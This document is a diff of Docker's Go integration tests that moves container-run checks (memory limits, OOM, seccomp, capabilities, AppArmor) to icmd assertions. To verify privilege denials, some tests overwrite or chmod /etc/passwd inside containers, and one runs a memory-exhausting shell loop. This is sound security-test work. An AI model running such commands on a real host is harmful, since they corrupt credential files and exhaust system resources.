+500,13 @@ func (s *DockerSuite) TestRunWithKernelMemory(c *check.C) { testRequires(c, kernelMemorySupport) file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes" - stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "--kernel-memory", "50M", "--name", "test1", "busybox", "cat", file) - c.Assert(strings.TrimSpace(stdout), checker.Equals, "52428800") + cli.DockerCmd(c, "run", "--kernel-memory", "50M", "--name", "test1", "busybox", "cat", file).Assert(c, icmd.Expected{ + Out: "52428800", + }) - out := inspectField(c, "test1", "HostConfig.KernelMemory") - c.Assert(out, check.Equals, "52428800") + cli.InspectCmd(c, "test1", cli.Format(".HostConfig.KernelMemory")).Assert(c, icmd.Expected{ + Out: "52428800", + }) } func (s *DockerSuite) TestRunWithInvalidKernelMemory(c *check.C) { @@ -531,8 +538,9 @@ func (s *DockerSuite) TestRunWithCPUShares(c *check.C) { func (s *DockerSuite) TestRunEchoStdoutWithCPUSharesAndMemoryLimit(c *check.C) { testRequires(c, cpuShare) testRequires(c, memoryLimitSupport) - out, _, _ := dockerCmdWithStdoutStderr(c, "run", "--cpu-shares", "1000", "-m", "32m", "busybox", "echo", "test") - c.Assert(out, checker.Equals, "test\n", check.Commentf("container should've printed 'test'")) + cli.DockerCmd(c, "run", "--cpu-shares", "1000", "-m", "32m", "busybox", "echo", "test").Assert(c, icmd.Expected{ + Out: "test\n", + }) } func (s *DockerSuite) TestRunWithCpusetCpus(c *check.C) { @@ -607,11 +615,12 @@ func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceWriteIOps(c *check.C) } func (s *DockerSuite) TestRunOOMExitCode(c *check.C) { - testRequires(c, memoryLimitSupport, swapMemorySupport) + testRequires(c, memoryLimitSupport, swapMemorySupport, NotPpc64le) errChan := make(chan error) go func() { defer close(errChan) - out, exitCode, _ := dockerCmdWithError("run", "-m", "4MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") + // memory limit lower than 8MB will raise an error of "device or resource busy" from docker-runc. + out, exitCode, _ := dockerCmdWithError("run", "-m", "8MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") if expected := 137; exitCode != expected { errChan <- fmt.Errorf("wrong exit code for OOM container: expected %d, got %d (output: %q)", expected, exitCode, out) } @@ -629,11 +638,12 @@ func (s *DockerSuite) TestRunWithMemoryLimit(c *check.C) { testRequires(c, memoryLimitSupport) file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" - stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "-m", "32M", "--name", "test", "busybox", "cat", file) - c.Assert(strings.TrimSpace(stdout), checker.Equals, "33554432") - - out := inspectField(c, "test", "HostConfig.Memory") - c.Assert(out, check.Equals, "33554432") + cli.DockerCmd(c, "run", "-m", "32M", "--name", "test", "busybox", "cat", file).Assert(c, icmd.Expected{ + Out: "33554432", + }) + cli.InspectCmd(c, "test", cli.Format(".HostConfig.Memory")).Assert(c, icmd.Expected{ + Out: "33554432", + }) } // TestRunWithoutMemoryswapLimit sets memory limit and disables swap @@ -670,7 +680,7 @@ func (s *DockerSuite) TestRunWithSwappinessInvalid(c *check.C) { } func (s *DockerSuite) TestRunWithMemoryReservation(c *check.C) { - testRequires(c, memoryReservationSupport) + testRequires(c, SameHostDaemon, memoryReservationSupport) file := "/sys/fs/cgroup/memory/memory.soft_limit_in_bytes" out, _ := dockerCmd(c, "run", "--memory-reservation", "200M", "--name", "test", "busybox", "cat", file) @@ -682,7 +692,7 @@ func (s *DockerSuite) TestRunWithMemoryReservation(c *check.C) { func (s *DockerSuite) TestRunWithMemoryReservationInvalid(c *check.C) { testRequires(c, memoryLimitSupport) - testRequires(c, memoryReservationSupport) + testRequires(c, SameHostDaemon, memoryReservationSupport) out, _, err := dockerCmdWithError("run", "-m", "500M", "--memory-reservation", "800M", "busybox", "true") c.Assert(err, check.NotNil) expected := "Minimum memory limit can not be less than memory reservation limit" @@ -829,17 +839,11 @@ func (s *DockerSuite) TestRunTmpfsMounts(c *check.C) { func (s *DockerSuite) TestRunTmpfsMountsOverrideImageVolumes(c *check.C) { name := "img-with-volumes" - _, err := buildImage( - name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox VOLUME /run RUN touch /run/stuff - `, - true) - if err != nil { - c.Fatal(err) - } + `)) out, _ := dockerCmd(c, "run", "--tmpfs", "/run", name, "ls", "/run") c.Assert(out, checker.Not(checker.Contains), "stuff") } @@ -886,7 +890,6 @@ func (s *DockerSuite) TestRunTmpfsMountsWithOptions(c *check.C) { } func (s *DockerSuite) TestRunSysctls(c *check.C) { - testRequires(c, DaemonIsLinux) var err error @@ -909,11 +912,11 @@ func (s *DockerSuite) TestRunSysctls(c *check.C) { c.Assert(err, check.IsNil) c.Assert(sysctls["net.ipv4.ip_forward"], check.Equals, "0") - runCmd := exec.Command(dockerBinary, "run", "--sysctl", "kernel.foobar=1", "--name", "test2", "busybox", "cat", "/proc/sys/kernel/foobar") - out, _, _ = runCommandWithOutput(runCmd) - if !strings.Contains(out, "invalid argument") { - c.Fatalf("expected --sysctl to fail, got %s", out) - } + icmd.RunCommand(dockerBinary, "run", "--sysctl", "kernel.foobar=1", "--name", "test2", + "busybox", "cat", "/proc/sys/kernel/foobar").Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "invalid argument", + }) } // TestRunSeccompProfileDenyUnshare checks that 'docker run --security-opt seccomp=/tmp/profile.json debian:jessie unshare' exits with operation not permitted. @@ -937,11 +940,12 @@ func (s *DockerSuite) TestRunSeccompProfileDenyUnshare(c *check.C) { if _, err := tmpFile.Write([]byte(jsonData)); err != nil { c.Fatal(err) } - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc") - out, _, _ := runCommandWithOutput(runCmd) - if !strings.Contains(out, "Operation not permitted") { - c.Fatalf("expected unshare with seccomp profile denied to fail, got %s", out) - } + icmd.RunCommand(dockerBinary, "run", "--security-opt", "apparmor=unconfined", + "--security-opt", "seccomp="+tmpFile.Name(), + "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } // TestRunSeccompProfileDenyChmod checks that 'docker run --security-opt seccomp=/tmp/profile.json busybox chmod 400 /etc/hostname' exits with operation not permitted. @@ -971,15 +975,15 @@ func (s *DockerSuite) TestRunSeccompProfileDenyChmod(c *check.C) { if _, err := tmpFile.Write([]byte(jsonData)); err != nil { c.Fatal(err) } - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "400", "/etc/hostname") - out, _, _ := runCommandWithOutput(runCmd) - if !strings.Contains(out, "Operation not permitted") { - c.Fatalf("expected chmod with seccomp profile denied to fail, got %s", out) - } + icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp="+tmpFile.Name(), + "busybox", "chmod", "400", "/etc/hostname").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } // TestRunSeccompProfileDenyUnshareUserns checks that 'docker run debian:jessie unshare --map-root-user --user sh -c whoami' with a specific profile to -// deny unhare of a userns exits with operation not permitted. +// deny unshare of a userns exits with operation not permitted. func (s *DockerSuite) TestRunSeccompProfileDenyUnshareUserns(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled, NotArm, Apparmor) // from sched.h @@ -1008,11 +1012,12 @@ func (s *DockerSuite) TestRunSeccompProfileDenyUnshareUserns(c *check.C) { if _, err := tmpFile.Write([]byte(jsonData)); err != nil { c.Fatal(err) } - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami") - out, _, _ := runCommandWithOutput(runCmd) - if !strings.Contains(out, "Operation not permitted") { - c.Fatalf("expected unshare userns with seccomp profile denied to fail, got %s", out) - } + icmd.RunCommand(dockerBinary, "run", + "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), + "debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } // TestRunSeccompProfileDenyCloneUserns checks that 'docker run syscall-test' @@ -1021,11 +1026,10 @@ func (s *DockerSuite) TestRunSeccompProfileDenyCloneUserns(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) ensureSyscallTest(c) - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "userns-test", "id") - out, _, err := runCommandWithOutput(runCmd) - if err == nil || !strings.Contains(out, "clone failed: Operation not permitted") { - c.Fatalf("expected clone userns with default seccomp profile denied to fail, got %s: %v", out, err) - } + icmd.RunCommand(dockerBinary, "run", "syscall-test", "userns-test", "id").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "clone failed: Operation not permitted", + }) } // TestRunSeccompUnconfinedCloneUserns checks that @@ -1035,10 +1039,10 @@ func (s *DockerSuite) TestRunSeccompUnconfinedCloneUserns(c *check.C) { ensureSyscallTest(c) // make sure running w privileged is ok - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "syscall-test", "userns-test", "id") - if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") { - c.Fatalf("expected clone userns with --security-opt seccomp=unconfined to succeed, got %s: %v", out, err) - } + icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp=unconfined", + "syscall-test", "userns-test", "id").Assert(c, icmd.Expected{ + Out: "nobody", + }) } // TestRunSeccompAllowPrivCloneUserns checks that 'docker run --privileged syscall-test' @@ -1048,10 +1052,9 @@ func (s *DockerSuite) TestRunSeccompAllowPrivCloneUserns(c *check.C) { ensureSyscallTest(c) // make sure running w privileged is ok - runCmd := exec.Command(dockerBinary, "run", "--privileged", "syscall-test", "userns-test", "id") - if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") { - c.Fatalf("expected clone userns with --privileged to succeed, got %s: %v", out, err) - } + icmd.RunCommand(dockerBinary, "run", "--privileged", "syscall-test", "userns-test", "id").Assert(c, icmd.Expected{ + Out: "nobody", + }) } // TestRunSeccompProfileAllow32Bit checks that 32 bit code can run on x86_64 @@ -1060,10 +1063,7 @@ func (s *DockerSuite) TestRunSeccompProfileAllow32Bit(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled, IsAmd64) ensureSyscallTest(c) - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "exit32-test", "id") - if out, _, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("expected to be able to run 32 bit code, got %s: %v", out, err) - } + icmd.RunCommand(dockerBinary, "run", "syscall-test", "exit32-test").Assert(c, icmd.Success) } // TestRunSeccompAllowSetrlimit checks that 'docker run debian:jessie ulimit -v 1048510' succeeds. @@ -1071,10 +1071,7 @@ func (s *DockerSuite) TestRunSeccompAllowSetrlimit(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) // ulimit uses setrlimit, so we want to make sure we don't break it - runCmd := exec.Command(dockerBinary, "run", "debian:jessie", "bash", "-c", "ulimit -v 1048510") - if out, _, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("expected ulimit with seccomp to succeed, got %s: %v", out, err) - } + icmd.RunCommand(dockerBinary, "run", "debian:jessie", "bash", "-c", "ulimit -v 1048510").Assert(c, icmd.Success) } func (s *DockerSuite) TestRunSeccompDefaultProfileAcct(c *check.C) { @@ -1142,193 +1139,188 @@ func (s *DockerSuite) TestRunSeccompDefaultProfileNS(c *check.C) { } } -// TestRunNoNewPrivSetuid checks that --security-opt=no-new-privileges prevents +// TestRunNoNewPrivSetuid checks that --security-opt='no-new-privileges=true' prevents // effective uid transtions on executing setuid binaries. func (s *DockerSuite) TestRunNoNewPrivSetuid(c *check.C) { testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) ensureNNPTest(c) // test that running a setuid binary results in no effective uid transition - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "no-new-privileges", "--user", "1000", "nnp-test", "/usr/bin/nnp-test") - if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "EUID=1000") { - c.Fatalf("expected output to contain EUID=1000, got %s: %v", out, err) - } + icmd.RunCommand(dockerBinary, "run", "--security-opt", "no-new-privileges=true", "--user", "1000", + "nnp-test", "/usr/bin/nnp-test").Assert(c, icmd.Expected{ + Out: "EUID=1000", + }) +} + +// TestLegacyRunNoNewPrivSetuid checks that --security-opt=no-new-privileges prevents +// effective uid transtions on executing setuid binaries. +func (s *DockerSuite) TestLegacyRunNoNewPrivSetuid(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) + ensureNNPTest(c) + + // test that running a setuid binary results in no effective uid transition + icmd.RunCommand(dockerBinary, "run", "--security-opt", "no-new-privileges", "--user", "1000", + "nnp-test", "/usr/bin/nnp-test").Assert(c, icmd.Expected{ + Out: "EUID=1000", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChown(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_CHOWN - runCmd := exec.Command(dockerBinary, "run", "busybox", "chown", "100", "/tmp") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "busybox", "chown", "100", "/tmp") // test that non root user does not have default capability CAP_CHOWN - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chown", "100", "/tmp") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "chown", "100", "/tmp").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_CHOWN - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "chown", "busybox", "chown", "100", "/tmp") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "chown", "busybox", "chown", "100", "/tmp").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesDacOverride(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_DAC_OVERRIDE - runCmd := exec.Command(dockerBinary, "run", "busybox", "sh", "-c", "echo test > /etc/passwd") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "busybox", "sh", "-c", "echo test > /etc/passwd") // test that non root user does not have default capability CAP_DAC_OVERRIDE - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "sh", "-c", "echo test > /etc/passwd") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Permission denied") - // TODO test that root user can drop default capability CAP_DAC_OVERRIDE + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "sh", "-c", "echo test > /etc/passwd").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Permission denied", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesFowner(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_FOWNER - runCmd := exec.Command(dockerBinary, "run", "busybox", "chmod", "777", "/etc/passwd") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "busybox", "chmod", "777", "/etc/passwd") // test that non root user does not have default capability CAP_FOWNER - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chmod", "777", "/etc/passwd") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "chmod", "777", "/etc/passwd").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // TODO test that root user can drop default capability CAP_FOWNER } // TODO CAP_KILL func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetuid(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_SETUID - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setuid-test") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "syscall-test", "setuid-test") // test that non root user does not have default capability CAP_SETUID - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setuid-test") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setuid-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_SETUID - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "setuid", "syscall-test", "setuid-test") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "setuid", "syscall-test", "setuid-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetgid(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_SETGID - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setgid-test") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "syscall-test", "setgid-test") // test that non root user does not have default capability CAP_SETGID - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setgid-test") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setgid-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_SETGID - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "setgid", "syscall-test", "setgid-test") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "setgid", "syscall-test", "setgid-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } // TODO CAP_SETPCAP func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetBindService(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_NET_BIND_SERVICE - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "socket-test") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "syscall-test", "socket-test") // test that non root user does not have default capability CAP_NET_BIND_SERVICE - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "socket-test") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Permission denied") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "socket-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Permission denied", + }) // test that root user can drop default capability CAP_NET_BIND_SERVICE - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "net_bind_service", "syscall-test", "socket-test") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Permission denied") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "net_bind_service", "syscall-test", "socket-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Permission denied", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetRaw(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_NET_RAW - runCmd := exec.Command(dockerBinary, "run", "syscall-test", "raw-test") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "syscall-test", "raw-test") // test that non root user does not have default capability CAP_NET_RAW - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "raw-test") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "raw-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_NET_RAW - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "net_raw", "syscall-test", "raw-test") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "net_raw", "syscall-test", "raw-test").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChroot(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_SYS_CHROOT - runCmd := exec.Command(dockerBinary, "run", "busybox", "chroot", "/", "/bin/true") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "busybox", "chroot", "/", "/bin/true") // test that non root user does not have default capability CAP_SYS_CHROOT - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chroot", "/", "/bin/true") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "chroot", "/", "/bin/true").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_SYS_CHROOT - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "sys_chroot", "busybox", "chroot", "/", "/bin/true") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "sys_chroot", "busybox", "chroot", "/", "/bin/true").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } func (s *DockerSuite) TestUserNoEffectiveCapabilitiesMknod(c *check.C) { - testRequires(c, DaemonIsLinux, NotUserNamespace) + testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) ensureSyscallTest(c) // test that a root user has default capability CAP_MKNOD - runCmd := exec.Command(dockerBinary, "run", "busybox", "mknod", "/tmp/node", "b", "1", "2") - _, _, err := runCommandWithOutput(runCmd) - c.Assert(err, check.IsNil) + dockerCmd(c, "run", "busybox", "mknod", "/tmp/node", "b", "1", "2") // test that non root user does not have default capability CAP_MKNOD - runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "mknod", "/tmp/node", "b", "1", "2") - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_SYS_CHROOT + icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "mknod", "/tmp/node", "b", "1", "2").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // test that root user can drop default capability CAP_MKNOD - runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "mknod", "busybox", "mknod", "/tmp/node", "b", "1", "2") - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Operation not permitted") + icmd.RunCommand(dockerBinary, "run", "--cap-drop", "mknod", "busybox", "mknod", "/tmp/node", "b", "1", "2").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) } // TODO CAP_AUDIT_WRITE @@ -1338,14 +1330,16 @@ func (s *DockerSuite) TestRunApparmorProcDirectory(c *check.C) { testRequires(c, SameHostDaemon, Apparmor) // running w seccomp unconfined tests the apparmor profile - runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/cgroup") - if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) { - c.Fatalf("expected chmod 777 /proc/1/cgroup to fail, got %s: %v", out, err) + result := icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/cgroup") + result.Assert(c, icmd.Expected{ExitCode: 1}) + if !(strings.Contains(result.Combined(), "Permission denied") || strings.Contains(result.Combined(), "Operation not permitted")) { + c.Fatalf("expected chmod 777 /proc/1/cgroup to fail, got %s: %v", result.Combined(), result.Error) } - runCmd = exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/attr/current") - if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) { - c.Fatalf("expected chmod 777 /proc/1/attr/current to fail, got %s: %v", out, err) + result = icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/attr/current") + result.Assert(c, icmd.Expected{ExitCode: 1}) + if !(strings.Contains(result.Combined(), "Permission denied") || strings.Contains(result.Combined(), "Operation not permitted")) { + c.Fatalf("expected chmod 777 /proc/1/attr/current to fail, got %s: %v", result.Combined(), result.Error) } } @@ -1410,7 +1404,7 @@ func (s *DockerSuite) TestRunDeviceSymlink(c *check.C) { // TestRunPIDsLimit makes sure the pids cgroup is set with --pids-limit func (s *DockerSuite) TestRunPIDsLimit(c *check.C) { - testRequires(c, pidsLimit) + testRequires(c, SameHostDaemon, pidsLimit) file := "/sys/fs/cgroup/pids/pids.max" out, _ := dockerCmd(c, "run", "--name", "skittles", "--pids-limit", "4", "busybox", "cat", file) @@ -1449,8 +1443,7 @@ func (s *DockerSuite) TestRunUserDeviceAllowed(c *check.C) { func (s *DockerDaemonSuite) TestRunSeccompJSONNewFormat(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) jsonData := `{ "defaultAction": "SCMP_ACT_ALLOW", @@ -1475,8 +1468,7 @@ func (s *DockerDaemonSuite) TestRunSeccompJSONNewFormat(c *check.C) { func (s *DockerDaemonSuite) TestRunSeccompJSONNoNameAndNames(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) jsonData := `{ "defaultAction": "SCMP_ACT_ALLOW", @@ -1502,8 +1494,7 @@ func (s *DockerDaemonSuite) TestRunSeccompJSONNoNameAndNames(c *check.C) { func (s *DockerDaemonSuite) TestRunSeccompJSONNoArchAndArchMap(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) jsonData := `{ "archMap": [ @@ -1540,11 +1531,10 @@ func (s *DockerDaemonSuite) TestRunSeccompJSONNoArchAndArchMap(c *check.C) { func (s *DockerDaemonSuite) TestRunWithDaemonDefaultSeccompProfile(c *check.C) { testRequires(c, SameHostDaemon, seccompEnabled) - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) // 1) verify I can run containers with the Docker default shipped profile which allows chmod - _, err = s.d.Cmd("run", "busybox", "chmod", "777", ".") + _, err := s.d.Cmd("run", "busybox", "chmod", "777", ".") c.Assert(err, check.IsNil) jsonData := `{ @@ -1563,8 +1553,7 @@ func (s *DockerDaemonSuite) TestRunWithDaemonDefaultSeccompProfile(c *check.C) { c.Assert(err, check.IsNil) // 2) restart the daemon and add a custom seccomp profile in which we deny chmod - err = s.d.Restart("--seccomp-profile=" + tmpFile.Name()) - c.Assert(err, check.IsNil) + s.d.Restart(c, "--seccomp-profile="+tmpFile.Name()) out, err := s.d.Cmd("run", "busybox", "chmod", "777", ".") c.Assert(err, check.NotNil) @@ -1579,14 +1568,18 @@ func (s *DockerSuite) TestRunWithNanoCPUs(c *check.C) { out, _ := dockerCmd(c, "run", "--cpus", "0.5", "--name", "test", "busybox", "sh", "-c", fmt.Sprintf("cat %s && cat %s", file1, file2)) 